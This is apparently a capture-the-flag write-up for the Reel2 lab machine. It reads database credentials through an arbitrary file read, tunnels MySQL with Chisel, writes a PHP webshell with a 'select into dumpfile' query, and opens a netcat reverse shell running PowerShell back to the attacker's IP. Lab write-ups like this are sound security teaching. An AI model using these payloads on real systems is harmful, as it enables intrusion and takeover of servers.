Reel2: Root Shell
Both YB1 and JKR suggested a neat method for getting a shell on Reel2 that involves abusing the Apache Web server running as SYSTEM to write a webshell. It’s a neat path that involves identifying where the config files are and getting access to the database using the arbitrary read intended to get the root flag.
Enumeration
Webservers
nmap
nmap shows multiple HTTP(S) servers, both IIS and Apache httpd:
oxdf@parrot$ nmap -p 80,443,8080 -sCV 10.10.10.210
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-14 21:42 EDT
Nmap scan report for 10.10.10.210
Host is up (0.018s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=Reel2
| Subject Alternative Name: DNS:Reel2, DNS:Reel2.htb.local
| Not valid before: 2020-07-30T10:12:46
|_Not valid after: 2025-07-30T10:12:46
|_ssl-date: 2021-03-15T01:46:03+00:00; +2m39s from scanner time.
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
|_http-title: Welcome | Wallstant
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m38s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.74 seconds
The TCP 8080 instance if from httpd, and that’s the Wallstant social media page.
Directories
In the filesystem root there’s both a inetpub (IIS default location) and xampp (XAMPP stack for Apache/MySQL):
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/30/2020 12:15 PM ExchangeSetupLogs
d----- 7/30/2020 12:02 PM inetpub
d----- 8/22/2013 5:52 PM PerfLogs
d-r--- 2/18/2021 1:16 PM Program Files
d----- 2/12/2021 2:49 PM Program Files (x86)
d-r--- 7/30/2020 1:17 PM Users
d----- 2/12/2021 3:09 PM Windows
d----- 7/28/2020 2:57 PM xampp
I can’t access anything in either of these directories as k.svensson:
PS C:\inetpub> ls
ls : Access to the path 'C:\inetpub' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\inetpub:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\xampp> ls
ls : Access to the path 'C:\xampp' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\xampp:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Process List
I tried a bunch of way to get the process list as well, but still no permissions. tasklist and tasklist /v don’t show the owning processes. Get-Process has a -IncludeUserName flag, but I don’t have permissions:
PS C:\xampp> Get-Process -IncludeUserName
Get-Process : The 'IncludeUserName' parameter requires elevated user rights. Try running the command again in a
session that has been opened with elevated user rights (that is, Run as Administrator).
At line:1 char:1
+ Get-Process -IncludeUserName
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-Process], InvalidOperationException
+ FullyQualifiedErrorId : IncludeUserNameRequiresElevation,Microsoft.PowerShell.Commands.GetProcessCommand
I failed as well with wmic commands.
Assumption
At this point, it’s unclear which user is running the web process, but it’s likely one that has some kind of privilege, and it’s not unreasonable to guess that it’s running as SYSTEM.
Database
IIS would typically use MSSQL (TCP 1433), and I’d expect XAMPP to install MySQL (TCP 3306). netstat -ano didn’t show 1433, but did show a likely MySQL service:
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 2352
DB Access
Find DB Creds
Find Server Root
While my shell can’t access the Apache configurations, I rooted the box via arbitrary read in the Check-File command through the jea_test_account shell. Some Googling shows that the config file for httpd is at C:\xampp\apache\conf\httpd.conf. This shell doesn’t have access to select-string to filter the results, so I’ll have to search though my shell to find what I’m looking for amongst a lot of output:
[10.10.10.210]: PS>Check-File C:\Programdata\..\xampp\apache\conf\httpd.conf
#
# This is the main Apache HTTP server configuration file. It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.4/> for detailed information.
# In particular, see
# <URL:http://httpd.apache.org/docs/2.4/mod/directives.html>
# for a discussion of each configuration di
...[snip]...
DocumentRoot "/xampp/htdocs/social"
<Directory "/xampp/htdocs/social">
Options Indexes FollowSymLinks Includes ExecCGI
AllowOverride All
Require all granted
</Directory>
...[snip]...
For sanity, I confirmed that index.php exists at C:\xampp\htdocs\social\index.php.
Alternatively, YB1 pointed out to me that there was a crash in the website that shows this same info. Start typing a search, and then it drops down three options:
Selecting “Search more about” will lead to a crash that includes the path:
Find Wallstant Config
Because Wallstant is open-source, I can go to GitHub and look around the code for where the database credentials are stored. I’ll find them in here, in config/connect.php:
On Reel2, I can get that same file:
[10.10.10.210]: PS>Check-File C:\Programdata\..\xampp\htdocs\social\config\connect.php
<?php
$servername = "localhost";
$username = "root";
$password = "Gregswd123FAEytjty";
$dbname = "wallstant";
...[snip]...
Connecting to DB
As I didn’t have access to 3306 in my original nmap scan but it is listening according to the netstat, the firewall must be blocking access. Back in my full shell as k.svensson, I’ll upload Chisel (see my post on Chisel for more details):
PS C:\programdata> iwr http://10.10.14.10/chisel_1.7.6_windows_amd64 -outfile c.exe
I’ll start the server, and then run the client from Reel2:
PS C:\programdata> .\c.exe client 10.10.14.10:8000 R:3306:localhost:3306
.\c.exe client 10.10.14.10:8000 R:3306:localhost:3306
2021/03/15 12:26:07 client: Connecting to ws://10.10.14.10:8000
2021/03/15 12:26:07 client: Connected (Latency 20.4784ms)
At the server the connection shows up:
oxdf@parrot$ ./chisel_1.7.6_linux_amd64 server -p 8000 --reverse
2021/03/15 07:23:21 server: Reverse tunnelling enabled
2021/03/15 07:23:21 server: Fingerprint FHyXk/mKppuP4EyXIzlk5cCI/H4TQOELm7IpiriOTes=
2021/03/15 07:23:21 server: Listening on http://0.0.0.0:8000
2021/03/15 07:23:28 server: session#1: tun: proxy#R:3306=>localhost:3306: Listening
Now I can connect with the creds from the config to 127.0.0.1:3306 (apt install mariadb-client on Parrot to get the mysql client):
oxdf@parrot$ mysql -h 127.0.0.1 -u root -pGregswd123FAEytjty wallstant
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 885
Server version: 10.4.13-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [wallstant]>
Webshell
I’ll use that database access to write a webshell. Create a table:
MariaDB [wallstant]> create table df(stuff text);
Query OK, 0 rows affected (0.126 sec)
Write webshell into table:
MariaDB [wallstant]> insert into df values('<?php system($_REQUEST["cmd"]); ?>');
Query OK, 1 row affected (0.105 sec)
Output that table to a file:
MariaDB [wallstant]> select * from df into dumpfile 'C:\\xampp\\htdocs\\social\\0xdf.php';
Query OK, 1 row affected, 1 warning (0.121 sec)
It worked:
oxdf@parrot$ curl -s "http://10.10.10.210:8080/0xdf.php?cmd=whoami"
nt authority\system
Shell
I could get that to a full shell by uploading nc64.exe, or using a PowerShell reverse shell. I actually already had nc64.exe on Reel2 from some testing I was doing, so triggering it to get a reverse shell is easy:
oxdf@parrot$ curl -s "http://10.10.10.210:8080/0xdf.php" --data-urlencode "cmd=\programdata\nc64.exe -e powershell 10.10.14.10 443"
At a local nc:
oxdf@parrot$ sudo nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.210] 45095
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\social> whoami
nt authority\system